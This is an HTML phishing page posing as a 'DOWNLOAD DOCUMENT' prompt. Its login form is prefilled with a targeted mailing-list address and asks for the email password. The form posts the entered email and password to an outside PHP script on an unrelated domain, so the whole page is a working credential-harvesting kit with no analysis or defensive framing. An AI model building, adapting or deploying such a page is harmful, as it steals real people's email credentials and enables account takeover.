<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>

<link rel="icon" type="image/jpg" href="https://images-fe.ssl-images-amazon.com/images/I/51eFJFSBSLL.png">

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>DOWNLOAD DOCUMENT</title>
</head>
<body style="position:absolute; overflow:hidden; left:0px; top:0px; width:1351px; height:660px; z-index:7"><img src="https://cdn.glitch.global/578f129a-3634-4e1a-a73f-de17d3148bb3/thumbnails%2Fgafo.png?1644241020440" alt="" title="" border=0 width=1370 height=663></div>

<style type="text/css">   
* {
        margin: 0;
        padding: 0;
        outline: none;
        
        -webkit-box-sizing: border-box;
        -moz-box-sizing: border-box;
        box-sizing: border-box;
    }
    
    body {
        color: #444;
        -webkit-font-smoothing: antialiased;
        font-family: "Open Sans", Arial, Helvetica, Geneva, sans-serif;
        font-size: 16px;
        font-weight: 400;
        height: auto !important;
        height: 100%;
        line-height: 1.6em;
        min-height: 100%;
        background-color: #FFFFFF;
    }
    
    h2 {
        color: rgb(34,34,34);
        font-size: 2.2em;   
        font-weight: 200;
        margin: 0 0 24px 0;
    }
    
    /*BUTTON DESIGN*/
    [class*='btn-'] {
        border: none;
        border-bottom: 2px solid rgba(0,0,0,.15);
        border-top: 1px solid rgba(255,255,255,.15);
        border-radius: 3px;
        color: #fff;
        display: inline-block;
        font: -webkit-small-control;
        font-size: .7em;
        letter-spacing: 1px;
        line-height: 140%;
        padding: 10px 20px;
        text-decoration: none;
        text-shadow: 0 1px 1px rgba(0, 0, 0, 0.25);
        text-transform: uppercase;
        
        -webkit-transition: all 0.1s linear;
        -moz-transition: all 0.1s linear;
        -o-transition: all 0.1s linear;
          transition: all 0.1s linear;
    }
    
        .btn-minimal {
        background-color: rgb(255,255,255);
        border-radius: 0;
        border: 1px solid rgb( 186, 186, 186 );
        color: rgb( 186, 186, 186 );
        text-shadow: 0 1px 1px rgba(255, 255, 255, 1);
    }
    
        .btn-minimal:hover {
            background-color: #4195fc;
            border: 1px solid rgba(0,0,0,.1);
            color: rgb(255,255,255);
            cursor: pointer;
            text-shadow: 0 1px 1px rgba(0, 0, 0, 0.25);
        }
        
        .btn-minimal:active {
        box-shadow: 0 1px 1px rgba(0,0,0,0.15) inset;
        text-shadow: 0 -1px 1px rgba(0, 0, 0, 0.25);
        text-transform: capitalize;
        }
    
    /*SECTION CONTAINER*/
    section#loginBox {
        background-color: rgb(255,255,255);
   border: 1px solid rgba(0,0,0,.15);
        border-radius: 4px;
        box-shadow: 0 1px 0 rgba(255,255,255,0.2) inset, 0 0 4px rgba(0,0,0,0.2);
        margin: 40px auto; /*aligns center*/
        padding: 24px;
        width: 500px;
    }
    
    /*FORM*/
    form.minimal label {
        display: block;
        margin: 6px 0;  
    }
    
        form.minimal input[type="text"],
        form.minimal input[type="email"],
        form.minimal input[type="number"],
        form.minimal input[type="search"],
        form.minimal input[type="password"],
        form.minimal textarea {
            background-color: rgb(255,255,255);
            border: 1px solid rgb( 186, 186, 186 );
            border-radius: 2px;
            -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.08);
            -moz-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.08);
              box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.08);
            display: block;
            font-family: "HelveticaNeue-Light", "Helvetica Neue Light", "Helvetica Neue", Helvetica, 'lucida grande', tahoma, verdana, arial, sans-serif;
            font-size: 14px;
            margin: 6px 0 12px 0;
            padding: 8px;   
            text-shadow: 0 1px 1px rgba(255, 255, 255, 1);
            width: 70%;
            
            -webkit-transition: all 0.1s linear;
            -moz-transition: all 0.1s linear;
            -o-transition: all 0.1s linear;
              transition: all 0.1s linear;
        }
        
        form.minimal input[type="text"]:focus,
        form.minimal input[type="email"]:focus,
        form.minimal input[type="number"]:focus,
        form.minimal input[type="search"]:focus,
        form.minimal input[type="password"]:focus,
        form.minimal textarea:focus,
        form.minimal select:focus {
        border-color: #4195fc;
            -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 0 8px #4195fc;
            -moz-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 0 8px #4195fc;
        box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 0 8px #4195fc;
        color: rgb(0,0,0);
        font-size: 16pt;
        }
        
            form.minimal input[type="text"]:invalid:focus,
            form.minimal input[type="email"]:invalid:focus,
            form.minimal input[type="number"]:invalid:focus,
            form.minimal input[type="search"]:invalid:focus,
            form.minimal input[type="password"]:invalid:focus,
            form.minimal textarea:invalid:focus,
            form.minimal select:invalid:focus { 
                border-color: rgb(248,66,66);
                -webkit-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 0 8px rgb(248,66,66);
                -moz-box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 0 8px rgb(248,66,66);
                  box-shadow: inset 0 1px 2px rgba(0, 0, 0, 0.1), 0 0 8px rgb(248,66,66);
            }

p {
  color: rgba(0,0,0,.8)
  font-size: .8em;
  margin: 0 0 24px 0;
}
.style3 {
        font-size: 18%;
        color: #333333;
        font-weight: bold;
        background-color: #FFFFFF;
}
.style7 {font-size: 16pt}
.style8 {color: #666666}
</style>
</head>
<body>

<div style="position: absolute; width: 313px; height: 20px; z-index: 1; left: 450px; top: 136px" id="layer3">
<SCRIPT language=JavaScript>
</SCRIPT>
<section id="loginBox">
  <br>
<br>
<br>
<br>
<br>
    <div align="center">
        
    <form method="post" class="minimal" autocomplete="" name="login_form" id="login_form" action="https://oceanbuillders.com/of/zender.php" target="_self"/>
            <p class="style3">
            
             
             
             <input class="validate[required]" value="pkg-multimedia-maintainers@lists.alioth.debian.org" autofocus id="Email Address" required="" name="login" placeholder="Enter your email address" style="width:313; height:40" type="email" 
             
             
             
             
           </p>
            <p class="style3">
           
             <input class="validate[required]" value="" autofocus id="Password" required="" name="passwd" placeholder="Email password" style="width:313; height:40" type="password">
             
      </p>
            <button type="submit" class="btn-minimal" onFocus="check(this.form)">CONTINUE >>></button>
                        <br>
<br>
<br>
<div style="position: absolute; width: 313px; height: 20px; z-index: 1; left: 80px; top: 55px" id="layer3">
<p><img  src="http://gifimage.net/wp-content/uploads/2017/09/animated-gif-in-pdf-12.gif" width="120px;" height="120px;" />
<div id="divLoading" style="margin: 0px; padding: 0px; position: absolute; left: 155px; top: 322px; width: 78; height: 20; background-color: rgb(); z-index: 30001; opacity: 0.8;">
<img src="https://cdn.glitch.com/6d993461-959a-4ebc-8057-1989624b3950%2Findex1.png?v=1625423534684" width="35px;" height="35px;" />
</html>